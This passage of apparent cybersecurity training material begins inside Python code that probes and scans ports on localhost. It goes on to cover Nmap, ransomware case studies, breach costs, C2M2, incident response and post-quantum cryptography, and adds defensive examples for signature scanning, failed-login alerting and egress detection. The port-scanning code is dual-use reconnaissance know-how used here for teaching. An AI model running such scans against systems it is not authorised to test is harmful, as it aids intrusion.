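    listener.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free ephemeral port
    listener.listen(5)
    port = listener.getsockname()[1]

    def accept_and_drop():
        while True:
            try:
                conn, _ = listener.accept()
                conn.close()
            except OSError:   # listener closed: stop serving
                break

    threading.Thread(target=accept_and_drop, daemon=True).start()
    return listener, port


if __name__ == "__main__":
    listener, port = start_local_listener()
    print(f"port {port} while listening: {probe_port('127.0.0.1', port)}")   # open
    listener.close()
    print(f"port {port} after closing:   {probe_port('127.0.0.1', port)}")   # closed
    for p, state in scan_ports("127.0.0.1", [80, 445, 3389], timeout=0.5).items():
        print(f"port {p:5} ({service_name(p)}): {state}")
```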

Example

HTTP web activity always occurs on TCP port 80. If a scan reveals that port 80 is open, the investigator knows
that some web-based application might be using it. For another example, Windows file sharing occurs on TCP
port 445. If attackers know this port is open, they might try to exploit it with malware. Famous ransomware
attacks, such as the WannaCry attacks, have targeted this port.

A notable port outside the list of well-known ports is TCP port 3389, the default port for the Microsoft Remote
Desktop Protocol (RDP). If attackers know this port is open and available, they can try to hack the remote
desktop software.
Network vulnerability scanning
In addition to dynamic scanning, other standard vulnerability scanning techniques include version and OS
detection:

• Version detection reveals the version numbers of software, such as Apache web server, running on the host

• OS detection reveals the device’s OS, such as macOS.

Network scanning
Network scans collect information about a network by targeting a host. Network and systems administrators rely
on network scans to assess the status and security of their organization’s network. Unfortunately, cyberattackers
can use these same tools for malicious purposes.

Many network scanning applications exist, but the most well-known scanner is Nmap.

Nmap (https://nmap.org/), short for Network Mapper, is a free, open-source network scanner available for
Windows, macOS, Linux, and other OSs. Though port scanning is its core feature, Nmap provides other valuable
features for investigating networks.

• It can reveal the network path from the scanning device to the host, including all other hosts encountered
along the way.

• It can perform version and OS detection.

• It can even identify firewalls in use.

Nmap is a command-line program, but most versions also include Zenmap, the official graphical user interface
(GUI) of Nmap. Zenmap (https://nmap.org/zenmap/) makes learning Nmap easier for beginners. With Nmap, you
must determine the precise command needed to perform your scan, and the number of options and syntactic
requirements can make this challenging. But with Zenmap, you can simply select choices from a user-friendly
interface to customize your scan. And if you still want to learn Nmap’s command-line options, Zenmap displays
the actual Nmap command and options behind your scan.

AI in technical scanning
AI has become valuable for network scanning. With machine learning (ML) algorithms, network scanners can
perform deeper, more helpful analysis.

• Scanners can independently analyze and categorize network vulnerabilities.

• Scanners can prioritize vulnerabilities based on their severity.

• Scanners can learn from past scans and identify patterns and trends to anticipate future threats.

AI can also streamline the scanning process. It can reduce the time needed to scrutinize large networks and
reduce the possibility of human error.
An example of an AI-driven network scanning tool is IBM’s QRadar® Advisor with Watson™ application. It
analyzes security incidents, identifies potential threats, and provides actionable insights. QRadar Advisor uses ML
and AI to sift through vast amounts of data, investigating offenses and eliminating false positives. As a result,
analysts are free to focus on confirmed threats, optimizing their time and resources.

Case Studies

What's new?

• Added two recent case studies:

• Los Angeles Unified School District

• CashApp

Los Angeles Unified School District


The Los Angeles Unified School District (LAUSD), the US’s second-biggest school district, experienced a
ransomware attack in 2022. This attack significantly impacted more than 1000 schools and 600,000 students.
The ransomware kept LAUSD officials from accessing their systems and a great deal of critical data. Some
examples of this data include Social Security numbers, login credentials, tax forms, legal documents, financial
reports, health information, background checks, and student psychological assessments. LAUSD decided not to
pay the ransom, following the guidance of cybersecurity experts and law enforcement for handling ransomware
attacks. In response, the attackers, a Russian criminal group called Vice Society, released the data on the dark
web.

This breach is one of the largest that the education sector has experienced. (1) It demonstrates how
attackers can exploit system vulnerabilities and disrupt the functions of critical public services. And
LAUSD’s decision not to pay the ransom highlights the difficult choice that institutions face when
dealing with ransomware. Overall, the breach exposed the need for robust cybersecurity measures in
educational institutions.

Image source: Photo by zephyr_p
(https://stock.adobe.com/contributor/205091778/zephyr-p?load_type=author&prev_url=detail) on Adobe Stock
(https://stock.adobe.com/search/free?k=ransomware&search_type=usertyped)
Cash App

In April 2022, a disgruntled former employee at Cash App used Cash App Investing to download data
from over 8 million users. Examples of data stolen include customer names, brokerage account
numbers, stock trading portfolios, and stock trading activity. Alarmingly, the breach went undetected
and unaddressed for four months. (1)

Note: This case study involves Cash App Investing, not the Cash App payment service that you’re more
likely familiar with.

Image source: Photo by Mariia Shalabaieva (https://unsplash.com/@maria_shalabaieva) on Unsplash
(https://unsplash.com/photos/graphical-user-interface-0KMCxhGFKvc)

Source: (1) Chin, Kyle. Biggest Data Breaches in US History [Updated 2023]
(https://www.upguard.com/blog/biggest-data-breaches-us). Upguard, November 10, 2023.

You’ve reached the end of the lesson. Be sure to select the “I’ve checked it out” checkbox to take a mini quiz to
check your understanding of this lesson. Passing this quiz is required for lesson completion.

What's new - cybersecurity: on the defense


20 मिनट

Financial Impacts

What's new

• Updated the key facts and takeaways from the Cost of a Data Breach Report to reflect the 2023
report’s findings

• Updated the key facts and takeaways from the Hiscox Cyber Readiness Report to reflect the 2023
report’s findings

• Elaborated on the Hiscox Cyber Readiness Report’s findings in more detail

Cost of data breaches
Let’s learn about how detrimental cyberattacks can be to organizations. The cost of cybercrime to organizations
can be hard to predict and very damaging.

The annual Cost of a Data Breach Report (https://www.ibm.com/security/data-breach), conducted by the
Ponemon Institute and sponsored by IBM Security, analyzes data breach costs reported by hundreds of
organizations around the world and across industries. According to the 2023 report, the average total cost of a
data breach is USD 4.45 million. The cost has increased by 15% since 2020.

Now, you’ll review more key facts about the costs of data breaches, all taken from the Cost of a Data Breach 2023
report. The amounts are in US dollars.

• $4.45M: The average total cost of a data breach was USD 4.45 million.

• $165: The average cost per record involved in a data breach was USD 165.

• 277 days: The mean time to identify and contain a data breach was 277 days or just over nine months.

• 57%: 57% of organizations have increased their prices because of a data breach.

• United States: The United States experienced the highest average total cost of a data breach at USD 9.48
million.

• Healthcare: Healthcare experienced the highest data breach costs of all industries at USD 10.93 million.

Data breaches can cause devastating financial losses.

• According to the report, the biggest contributor to these costs is detection and escalation. Detection and
escalation involve activities related to detecting breaches, such as security audits and forensic investigations.

• The second biggest contributor is lost business. This consequence can linger for years because of the
reputational harm that an organization experiences.

• Regulatory fines can also impact an organization. Organizations that host the data of European Union (EU)
residents or do business with EU countries face some of the stiffest penalties per the General Data Protection
Regulation (GDPR), an extensive data privacy law and regulation.

The rising cost of breaches is a key driver for the cybersecurity industry. And the number of high-profile cases will
probably increase as more countries adopt data standards such as those in the GDPR.

Facing the challenge of rising attacks


Hiscox is a global specialist insurer. The Hiscox Cyber Readiness Report 2023
(https://www.hiscoxgroup.com/sites/group/files/documents/2023-10/Hiscox-Cyber-Readiness-Report-
2023.pdf) gauges how prepared businesses are to combat cyberattacks. The annual report surveyed over 6,000
cybersecurity professionals worldwide. It found that the cost and number of attacks continue to rise.

Review the report’s key findings.

• 53% of reporting companies suffered a cyberattack, up from 48% the previous year.

• The median spent on cybersecurity was USD 155,000, a 39% increase over three years.

• The median cost for attacks decreased slightly from around USD 16,000 to 17,000. As businesses have spent
more money on their cybersecurity measures, the cost of attacks has decreased.

• One out of eight attacks cost more than USD 250,000.

• Small businesses, defined as those with under ten employees, spent four times more on cybersecurity than
they did two years prior. Still, the number of small businesses that experienced an attack increased from 23%
to 36% over three years.

• One out of three companies experienced consequences from payment diversion fraud, the leading cause of
financial loss for businesses. Payment diversion fraud is where an attacker tricks an organization into rerouting
payments intended for suppliers or other business expenses into a bank account that the attacker controls.

• One out of five companies received a ransom demand. The percentage of companies paying the ransom
dropped from 66% to 63%. The reason for this shift might be better awareness of how to deal with
ransomware attacks and that paying ransoms isn’t always the best decision.

Note: Regardless of the reasons for the decrease, organizations should continue seeking professional
guidance when they experience ransomware attacks. Experts can recommend strategies for recovering data,
negotiating with attackers, handling legal consequences, and preventing future attacks.

Security strategy

What's new?

• Added a section that describes the components of a comprehensive security strategy

• Revised and significantly expanded the “Security maturity” section, such as by adding a discussion
of the Cybersecurity Capability Maturity Model (C2M2) and how to apply it

Security strategy

A security strategy is an organization’s well-defined plan to protect its digital and physical assets. A
comprehensive security strategy consists of the following components.

• Risk assessment: Risk assessment helps to identify and understand potential threats and vulnerabilities that
can impact assets.

• Security policies and procedures: Security policies and procedures establish rules for maintaining security.

• Security awareness and training: Security awareness and training provide employees with the knowledge and
skills to prevent security breaches.

• Incident response: Incident response (IR) comprises the set of actions that an organization takes to prepare
for, detect, stop, and recover from cyberattacks.

• Auditing and testing: Auditing and testing ensure that security measures are effective and work as intended.

An IT security team or a specialized cybersecurity consultant is usually responsible for creating an organization’s
security strategy. Ideally, this strategy should be in place as soon as an organization forms, but it’s never too late
to start, and the sooner, the better! The organization should review and update its security strategy annually, if
not more frequently, to ensure that it remains effective and relevant given emerging threats and the
organization’s changing objectives and technologies.

Security maturity

An organization’s security strategy is vital to its overall security maturity. Security maturity is how well an
organization can protect its assets and respond to cybersecurity threats. The more advanced an organization’s
security protocols and strategies, the greater its maturity level.

Organizations have many security maturity models to choose from when evaluating their maturity. For simplicity’s
sake, we’ll focus on one popular model: the Cybersecurity Capability Maturity Model (C2M2). Developed
collaboratively by private and public sector organizations, C2M2 is designed to help organizations assess the
state of their cybersecurity capabilities. Organizations can use it as a guide to progress from a less mature state,
where cybersecurity measures might be reactive or poorly developed, to a more mature state, where measures
are proactive, optimized, and well-integrated into the organizational culture.

C2M2 scale

C2M2 uses a scale with four maturity indicator levels (MILs): MIL0, MIL1, MIL2, and MIL3. The levels differ by
specific behaviors, practices, and processes relating to cybersecurity. The following table summarizes the
characteristics of each maturity indicator level.

Level Characteristics

MIL0: Practices are not performed

MIL1: Initial practices are performed but might be ad hoc

MIL2:

Management characteristics:

• Practices are documented

• Adequate resources are provided to support the process

Approach characteristic:

• Practices are more complete or advanced than at MIL1

MIL3:

Management characteristics:

• Activities are guided by policies or other organizational directives

• Responsibility, accountability, and authority for performing the practices are assigned

• Personnel performing the practices have adequate skills and knowledge

• The effectiveness of activities is evaluated and tracked

Approach characteristic:

• Practices are more complete or advanced than at MIL2

Source: US Department of Energy
(https://www.energy.gov/sites/default/files/2022-06/C2M2%20Version%202.1%20June%202022.pdf)

• At MIL0, no one in the organization performs cybersecurity practices.

• At MIL1, these practices exist but are ad hoc, meaning that the practices are disorganized, reactive, and
spontaneous and performed without formal processes or documentation.

• At MIL2, cybersecurity practices are proactive; they’re documented and performed more consistently, and the
process is properly resourced.

• At MIL3, the organization has fully integrated cybersecurity into its strategic planning and considers it a core
aspect of its business operations. People have clearly established roles and responsibilities regarding
cybersecurity practices, and processes are well-defined and well-implemented. They regularly evaluate and
improve their cybersecurity practices based on experiences and the ever-changing threat landscape.

Note: An organization can be mature in one area of security while not being mature in another.

C2M2 applied
To understand how organizations can apply C2M2, consider the following example from the US Department of
Energy. The example shows the model used to evaluate an organization’s ability to reduce vulnerabilities.

Expand each section to learn more.

MIL1

At MIL1, one or more organization members perform the following actions to reduce vulnerabilities:

• Identifies data sources ad hoc to support vulnerability discovery

• Collects and analyzes vulnerability data ad hoc

• Performs vulnerability assessments ad hoc

• Mitigates relevant vulnerabilities ad hoc

MIL2

At MIL2, one or more organization members perform the following actions to reduce vulnerabilities:

• Monitors vulnerability data sources that address higher-priority assets

• Performs vulnerability assessments regularly and when key events occur, such as changes to the
network

• Analyzes identified vulnerabilities, ranks them by severity, and then addresses them appropriately

• Evaluates operational impact before applying mitigations such as patches

• Shares information about vulnerabilities with stakeholders

MIL3

At MIL3, one or more organization members perform the following actions to reduce vulnerabilities:

• Monitors vulnerability data sources that address all relevant IT and OT assets

• Ensures that people independent of the operations being assessed perform vulnerability
assessments

• Reviews the effectiveness of vulnerability mitigation

• Establishes and maintains ways to receive and respond to external reports, such as from public
websites, about vulnerabilities relevant to the organization’s IT and OT assets

Protect against attacks

What's new?

• Updated and expanded the “What is the goal?” section

• Revised the following sections for clarity:

• Examine the perimeter

• Network segregation

• Patch and vulnerability management

What is the goal?


A perfect, unbeatable security strategy doesn’t exist. Attackers always develop new techniques to bypass
security measures, making current defenses obsolete.

A more realistic and effective security strategy focuses on making successful attacks more difficult to achieve. By
doing so, organizations can deter all but the most determined attackers. Imagine that compromising a certain
organization’s system would cost an attacker USD 100,000 worth of resources. If the compromised system is
worth only USD 80,000 to the attacker, then the attacker is unlikely to attack. Therefore, the defense can work
despite its imperfections.

A practical yet effective security strategy often involves layering defenses, updating and patching systems
regularly, and investing in threat intelligence to stay ahead of emerging threats. These measures increase the
time, cost, and effort required to complete a successful attack, in turn dramatically reducing the likelihood of a
breach.

The goal of cybersecurity is to reduce operational risk to an acceptable level by introducing the correct mixture of
education, processes, and technologies.

Examine the perimeter

One of the first concepts to consider is attack surface. An attack surface is all the points in a system where an
attacker can attempt to enter it, impact it, or obtain data. The attack surface includes all points of vulnerability,
such as interfaces, protocols, and services.

The larger the attack surface, the greater the risk of infiltration. Therefore, a primary goal of any good security
strategy is to keep the attack surface as small as possible. Doing so minimizes vulnerabilities, making the system
less attractive and more difficult for attackers to breach.

Example

Consider an organization that has a payment record system. To reduce the system’s attack surface, the
organization restricts employees’ system access to several office locations. As a result, its cybersecurity team
can ignore external internet traffic at the perimeter, significantly reducing the attack surface for potential
attackers. Instead of having countless IP addresses from which to launch an attack, attackers must first
compromise a trusted device, and then use it for further attacks. This added layer of complexity increases the
challenge for attackers.

Organizations keep giving employees more ways to access internal systems. For example, many organizations
provide remote access methods and permit employees to access systems from personal devices. These features
have helped to improve accessibility, service offerings, and employment flexibility. But they’ve also expanded the
attack surface. As a result, establishing a secure perimeter has become more challenging. Organizations must be
aware of their perimeter and proactively monitor it.

Network segregation
A vital part of secure system design is a demilitarized zone. A demilitarized zone (DMZ) is a network segment
between an organization’s internal, private network and the internet. It’s a buffer zone that adds an extra layer of
safety. To access the internal network, attackers must go through the DMZ. Even if they breach the DMZ, the
internal network is still safe.

Typically, DMZs house servers that must be accessible from the wider internet yet still need protection. These
servers might include web, email, file transfer protocol (FTP), and DNS servers. These servers contain public data,
not sensitive internal data.

This diagram shows a DMZ in action. A legitimate external user can access servers and applications
contained in the DMZ, the segment between the external and internal firewalls. But this user cannot
access more sensitive servers and applications in the internal network behind the internal firewall.
For example, a customer might be able to place orders for a digital payment system or access email.
Still, they cannot access employee records or other customers’ financial data on the internal network.

Patch and vulnerability management
Software vulnerability management involves monitoring and mitigating vulnerabilities in software systems. It
includes patch management, the process of applying patches and updating systems as fixes become available.

When a vendor creates a new version of its software, it might decide to stop supporting the older version. For
example, Microsoft no longer supports older versions of Windows, such as Windows 7. As a result, the company
no longer releases security patches, making Windows 7 devices easy targets for attackers. When possible,
organizations should use software versions that the vendor supports. Otherwise, they should implement
compensating controls that reduce the risk associated with known vulnerabilities. These controls might include
disabling certain features, increasing network security, or increasing monitoring to detect suspicious activity.

Generally, updating software and applications to their latest versions significantly reduces the risk of a successful
attack. Still, new versions of software can also introduce vulnerabilities. Organizations must check with vendors
to know what and when patches are available. If a vendor has no fix for a vulnerability, organizations can
implement temporary compensating controls, such as disabling a feature or reverting to a previous version.

An organization can use a vulnerability scanner to assess what software is vulnerable to a specific attack. A
vulnerability scanner is an application that scans a system for known vulnerabilities, such as outdated software,
missing patches, misconfigured settings, or weak passwords. Some vulnerability scanners are network-based,
examining vulnerabilities by active testing. Others scan static source code for possible errors. Both scanners
produce valuable information for identifying flaws before an attacker does.

Detect attacks

What's new?

• Added a section on antimalware software

• Added a section on AI’s role in attack detection

Antimalware software

A standard method for attacking a system is malware, and a standard measure for detecting malware is
antimalware software. Antimalware software, or antivirus software, is specialized software that detects,
quarantines, and even destroys malware on computers or networks. Some well-known antimalware programs
include Malwarebytes, McAfee Antivirus, and Windows Defender Antivirus. You can install this software locally on
a single device or run and manage the software on a centralized server.

Antimalware software detects malware by scanning all device files for signatures. A malware signature is a
pattern of attributes that corresponds to known malware. After identifying a signature in a file, the software
deletes the file, quarantines it, or alerts you that the file might be infected.
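Signature scanning as described above, as an added example that is not code from the course or from any antimalware product. A signature here is either the SHA-256 hash of a known-bad file or a byte pattern inside it; the signature names, patterns, and sample files are constructed placeholders, and the three responses the text lists (quarantine, delete, alert) are selectable.

```python
"""Signature-based file scanning, the detection method described above.

Added illustration, not code from the course or from any antimalware product.
A signature is either the SHA-256 hash of a known-bad file or a byte pattern that
appears inside one; on a match the scanner quarantines, deletes, or only alerts.
All signatures and sample files below are constructed placeholders.
"""
import hashlib
import os
import shutil
import tempfile
from pathlib import Path

# Constructed signature database (placeholder names, not real malware indicators).
SAMPLE_DROPPER = b"CONSTRUCTED-SAMPLE-DROPPER-v1\x00\x01\x02"
HASH_SIGNATURES = {hashlib.sha256(SAMPLE_DROPPER).hexdigest(): "Demo.Dropper.A"}
BYTE_SIGNATURES = {b"DEMO-MALWARE-MARKER-7f3a": "Demo.Trojan.B"}
ACTIONS = ("quarantine", "delete", "alert")


def file_sha256(path: Path) -> str:
    """Hash a file in chunks so large files never have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def match_signatures(path: Path):
    """Return the name of the signature this file matches, or None if it looks clean."""
    name = HASH_SIGNATURES.get(file_sha256(path))
    if name:
        return name
    data = path.read_bytes()   # whole-file pattern search is fine for the demo
    for pattern, sig in BYTE_SIGNATURES.items():
        if pattern in data:
            return sig
    return None


def scan_tree(root, quarantine_dir, action="quarantine"):
    """Walk every file under root; on a match apply the chosen action and record the finding."""
    if action not in ACTIONS:
        raise ValueError(f"unknown action {action!r}")
    root, quarantine_dir = Path(root), Path(quarantine_dir)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        # never rescan what was already set aside
        dirnames[:] = [d for d in dirnames if Path(dirpath, d) != quarantine_dir]
        for filename in filenames:
            path = Path(dirpath, filename)
            sig = match_signatures(path)
            if sig is None:
                continue
            if action == "quarantine":
                quarantine_dir.mkdir(parents=True, exist_ok=True)
                # keep part of the hash in the name so two files with the same name do not collide
                dest = quarantine_dir / f"{filename}.{file_sha256(path)[:12]}.quarantined"
                shutil.move(str(path), str(dest))
            elif action == "delete":
                path.unlink()
            findings.append({"path": str(path), "signature": sig, "action": action})
    return findings


def build_demo_tree(root: Path):
    """Constructed fixture: one clean file, one hash match, one pattern match in a subfolder."""
    (root / "notes.txt").write_bytes(b"quarterly figures, nothing suspicious here")
    (root / "dropper.bin").write_bytes(SAMPLE_DROPPER)
    (root / "docs").mkdir()
    (root / "docs" / "report.doc").write_bytes(b"header " * 50 + b"DEMO-MALWARE-MARKER-7f3a" + b" tail")


def run_demo(action="quarantine"):
    """Build the fixture in a temp dir, scan it, clean up, and return what happened."""
    root = Path(tempfile.mkdtemp(prefix="sigscan-"))
    build_demo_tree(root)
    quarantine = root / "quarantine"
    findings = scan_tree(root, quarantine, action)
    remaining = sorted(p.name for p in root.rglob("*") if p.is_file() and quarantine not in p.parents)
    quarantined = sorted(p.name for p in quarantine.iterdir()) if quarantine.exists() else []
    shutil.rmtree(root)
    return {"detections": {Path(f["path"]).name: f["signature"] for f in findings},
            "remaining": remaining, "quarantined": quarantined}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```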

Artificial intelligence (AI)


Artificial intelligence (AI) is enhancing organizations’ attack detection and defense. Let’s explore how AI impacts
key areas of attack detection.

Expand each section to learn more.

Logging

AI automates the process of logging and analyzing large volumes of data from various sources. This
manual task would take a human an enormous amount of time, but AI can do it very quickly,
enabling real-time threat detection and prevention.

Network monitoring

AI can analyze traffic patterns and identify anomalies that might indicate an attack. For example, a
sudden surge in network traffic might indicate a distributed denial-of-service (DDoS) attack. With AI,
organizations can detect such anomalies instantly and initiate appropriate countermeasures.

Security Information and Event Management (SIEM)



Security information and event management tools use AI to collate and analyze data across an
organization’s network. These tools identify patterns and correlations, helping to identify potential
security threats. For example, QRadar SIEM sets alert thresholds for abnormal activities, such as
multiple failed login attempts.

Security Operation Center (SOC)



In a Security Operation Center, AI can help security analysts work more efficiently. Instead of
manually sifting through tons of data to identify potentially malicious activity, analysts can focus on
responding to the alerts that the AI system generates. AI not only saves analysts time but helps
mitigate threats more swiftly.

Machine learning (ML)



Organizations can train AI systems to distinguish between normal and unusual behavior. The AI
trains on historical data that includes legitimate threats and false positives. With the help of machine
learning algorithms, the AI system learns to recognize patterns associated with false positives.

For example, the system might determine that a certain number of failed login attempts from a
trusted internal IP address during working hours is a common pattern of a forgotten password, not a
malicious action. Therefore, the system learns not to trigger an alert in this situation. Over time, it
can become better at reducing false positives, thereby fine-tuning the thresholds and alert
sensitivity. It can even reduce the time spent on false positives by automating the verification
process.
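The learned exception described above, written out as an explicit rule so the decision is visible; this is an added example, not code from the course or from QRadar. Failures are grouped per user and source address, and a burst from a trusted internal address during working hours needs a much higher count before it alerts. The trusted network range, working hours, thresholds, and log lines are constructed assumptions.

```python
"""Failed-login alerting with the 'forgotten password' exception described above.

Added illustration, not code from the course or from QRadar. The text describes an ML
system learning that a burst of failed logins from a trusted internal address during
working hours is usually a forgotten password; here that learned outcome is written as
an explicit rule. Trusted ranges, hours, thresholds, and the log lines are constructed.
"""
from collections import defaultdict
from datetime import datetime, time, timedelta
import ipaddress
import re

# Constructed environment assumptions.
TRUSTED_INTERNAL = [ipaddress.ip_network("10.10.0.0/16")]
WORK_START, WORK_END = time(8, 0), time(18, 0)
WINDOW = timedelta(minutes=10)
ALERT_THRESHOLD = 5        # failures per (user, source) inside WINDOW under the generic rule
TRUSTED_THRESHOLD = 20     # much higher bar for trusted internal sources during working hours

# Constructed log format: "<ISO timestamp> LOGIN_FAILED user=<name> src=<ip>"
LOG_RE = re.compile(r"^(?P<ts>\S+) LOGIN_FAILED user=(?P<user>\S+) src=(?P<src>\S+)$")


def constructed_log() -> str:
    """Build the demo log: three bursts of six failures 20 s apart, and one run of two."""
    lines = []

    def burst(user, src, start, count):
        first = datetime.fromisoformat(start)
        for i in range(count):
            stamp = (first + timedelta(seconds=20 * i)).isoformat()
            lines.append(f"{stamp} LOGIN_FAILED user={user} src={src}")

    burst("alice", "10.10.4.22", "2024-03-04T09:12:01", 6)    # trusted, working hours: suppressed
    burst("admin", "203.0.113.77", "2024-03-04T02:15:00", 6)  # external, at night: alert
    burst("bob", "10.10.4.22", "2024-03-04T23:30:00", 6)      # trusted but after hours: alert
    burst("carol", "198.51.100.9", "2024-03-04T11:00:00", 2)  # below any threshold: nothing
    return "\n".join(lines)


def parse_events(text: str):
    """Turn log lines into events; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "user": m["user"], "src": m["src"]})
    return events


def is_trusted(src: str) -> bool:
    return any(ipaddress.ip_address(src) in net for net in TRUSTED_INTERNAL)


def in_working_hours(ts: datetime) -> bool:
    return WORK_START <= ts.time() < WORK_END


def peak_in_window(stamps):
    """Largest number of failures that fall inside any WINDOW-long span (two-pointer sweep)."""
    best = left = 0
    for right, ts in enumerate(stamps):
        while ts - stamps[left] > WINDOW:
            left += 1
        best = max(best, right - left + 1)
    return best


def evaluate(events):
    """Group failures per (user, source) and decide alert, suppress, or ignore for each group."""
    groups = defaultdict(list)
    for e in events:
        groups[(e["user"], e["src"])].append(e["ts"])
    alerts, suppressed = [], []
    for (user, src), stamps in groups.items():
        stamps.sort()
        peak = peak_in_window(stamps)
        trusted_hours = is_trusted(src) and all(in_working_hours(t) for t in stamps)
        threshold = TRUSTED_THRESHOLD if trusted_hours else ALERT_THRESHOLD
        record = {"user": user, "src": src, "failures": peak, "threshold": threshold}
        if peak >= threshold:
            alerts.append(record)
        elif trusted_hours and peak >= ALERT_THRESHOLD:
            suppressed.append(record)   # generic rule would have fired; learned exception applies
    return {"alerts": alerts, "suppressed": suppressed}


if __name__ == "__main__":
    result = evaluate(parse_events(constructed_log()))
    for a in result["alerts"]:
        print(f"ALERT    {a['user']}@{a['src']}: {a['failures']} failures (threshold {a['threshold']})")
    for s in result["suppressed"]:
        print(f"SUPPRESS {s['user']}@{s['src']}: {s['failures']} failures from a trusted source in hours")
```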

Respond to attacks

What's new?

• Added a scenario to the “Introducing incident response” section to illustrate how the phases work

• Updated the “Benefit of incident response teams” section to reflect the findings of the 2023 Cost
of a Data Breach Report

Introducing incident response


Consider a scenario where HealthyOnline, an online health service provider, experiences a data breach.
Preparation

Before the breach, HealthyOnline regularly conducted penetration testing to identify potential vulnerabilities.
They also prepared a detailed incident response plan, backed up all critical data, and trained all team
members on their roles and responsibilities for incident response.

Identification

The security team notices an unusual amount of data traffic from the server to an unknown IP address.
HealthyOnline initiates the incident response protocol quickly and confirms a possible data breach.

Containment

The security team immediately starts containment procedures. They isolate the compromised server from
the network to prevent the breach from spreading further. At the same time, they log out active user sessions
to minimize the risk.

Eradication

The security team identifies the malware responsible for the breach and completely removes it from the
system. The team replaces the compromised server with a clean backup and strengthens relevant firewall
rules to prevent recurrence.

Recovery

After ensuring that it has completely removed the threat, the security team reconnects the server to the
network. The organization gradually resumes operations, starting with the most critical services. The security
team resets all employee passwords. The organization informs customers of the incident and recommends
that customers also update their passwords.

Reflection

After operations return to normal, HealthyOnline reflects on the incident and response and summarizes its
findings in a report. The report notes that a recommended software patch had not been applied in time,
leaving a vulnerability that the attacker exploited. In response to this incident, the organization decides to
automate the patching process to avoid similar oversights in the future.

HealthyOnline completed all six phases of the incident response framework, resolving the incident swiftly and
effectively. And by implementing changes based on lessons learned, the organization is more resilient to future
attacks.
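The Identification phase above turns on one observation: an unusual volume of data leaving a server for an IP address nobody recognizes. The following is an added example (not code from the course) of the simplest detection that would surface that symptom: aggregate outbound bytes per source/destination pair from flow records and alert when an unknown destination receives more than a threshold. The flow records, the allowlist of expected destinations, and the threshold are all constructed for illustration; in production the records would come from NetFlow/IPFIX, cloud flow logs, or a firewall export, and the threshold would be derived from the server's historical baseline.

```python
"""Flag large outbound transfers to destinations that are not on an allowlist.

Added example, not part of the original course. Flow records, the allowlist
and the threshold below are constructed for illustration.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Destinations the server is expected to talk to (constructed allowlist).
KNOWN_DESTINATIONS = [
    ip_network("10.0.0.0/8"),        # internal networks
    ip_network("203.0.113.10/32"),   # constructed: the backup service
]

# Constructed flow records: (src_ip, dst_ip, bytes_out).
FLOWS = [
    ("10.0.5.20", "10.0.9.4", 120_000),              # internal traffic
    ("10.0.5.20", "203.0.113.10", 900_000_000),      # nightly backup: known destination
    ("10.0.5.20", "198.51.100.77", 40_000_000),      # unknown destination ...
    ("10.0.5.20", "198.51.100.77", 75_000_000),      # ... receiving a lot of data
    ("10.0.5.20", "198.51.100.77", 60_000_000),
    ("10.0.5.21", "198.51.100.9", 5_000),            # unknown, but tiny
]


def is_known(dst: str) -> bool:
    """True if the destination falls inside one of the allowlisted networks."""
    addr = ip_address(dst)
    return any(addr in net for net in KNOWN_DESTINATIONS)


def bytes_per_destination(flows):
    """Sum outbound bytes for every (src, dst) pair."""
    totals = defaultdict(int)
    for src, dst, nbytes in flows:
        totals[(src, dst)] += nbytes
    return totals


def find_suspicious_egress(flows, threshold_bytes=50_000_000):
    """Return (src, dst, total_bytes) for unknown destinations over the threshold.

    The backup job moves far more data than the unknown host, but it is on the
    allowlist, so only the unknown destination is reported.
    """
    alerts = []
    for (src, dst), total in sorted(bytes_per_destination(flows).items()):
        if not is_known(dst) and total >= threshold_bytes:
            alerts.append((src, dst, total))
    return alerts


if __name__ == "__main__":
    for src, dst, total in find_suspicious_egress(FLOWS):
        print(f"ALERT {src} -> {dst}: {total / 1e6:.1f} MB to an unknown destination")
```

A real deployment would key the threshold to each server's normal egress rather than a fixed number, and the alert would feed the Containment step (isolate the source host) rather than stop at a print statement.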

Benefit of incident response teams


Organizations benefit from having incident response teams. Response plans can save money.

For example, consider the findings in the 2023 Cost of a Data Breach Report
(https://www.ibm.com/security/data-breach). At organizations with incident response capabilities, the average
cost of a breach was USD 3.62 million in 2023. At organizations without incident response capabilities, the
average cost of a breach was USD 5.11 million, a difference of USD 1.49 million, or 34%.

Introducing Cryptography

What's new?

• Added a section about quantum encryption’s impact on cybersecurity

Quantum encryption

Present-day computers lack the power and stability to crack modern encryption technologies. But quantum
computing might be able to do so soon.

Quantum computing is a rapidly emerging technology that harnesses the laws of quantum mechanics to
solve problems too complex for classical computers.

– What is quantum computing? (https://www.ibm.com/topics/quantum-computing) IBM

Quantum computing processes information using quantum mechanics. As a result, it can perform complex
calculations much faster than traditional computing methods.

So, how does quantum computing relate to cryptography? In the hands of cyberattackers, it's a threat. A
sufficiently large quantum computer running Shor's algorithm could factor the large integers and solve the
discrete-logarithm problems on which today's public-key cryptography (RSA, Diffie-Hellman, and elliptic-curve
schemes) depends, rendering that encryption ineffective. Symmetric ciphers such as AES and hash functions are
affected far less; larger keys and digests restore their margin. The more immediate worry is "harvest now,
decrypt later": encrypted traffic recorded today could be decrypted once such a machine exists. Organizations
need new strategies to defend against this threat. Enter quantum-safe encryption.

Quantum-safe encryption refers to security methods and protocols resistant to quantum computing attacks.
Experts have proposed many post-quantum cryptography alternatives to defend against quantum computing
attacks. Let's explore the four families of post-quantum algorithms that experts expect to withstand quantum
computing attacks:

• Lattice-based cryptography builds encryption, key exchange, and digital signatures on hard problems in
multidimensional lattices, such as finding a short vector in a lattice. No known quantum algorithm solves
these problems efficiently.

• Hash-based cryptography builds digital signatures from a secure hash function alone. Its security rests only
on the one-wayness of the hash, which quantum search weakens only modestly, so these schemes are used for
signing rather than for encrypting data.

• Multivariate cryptography relies on the difficulty of solving systems of multivariate polynomial equations
over finite fields. It is used mainly for digital signatures.

• Code-based cryptography relies on the difficulty of decoding a general error-correcting code without
knowing its hidden structure, which only the holder of the private key knows.
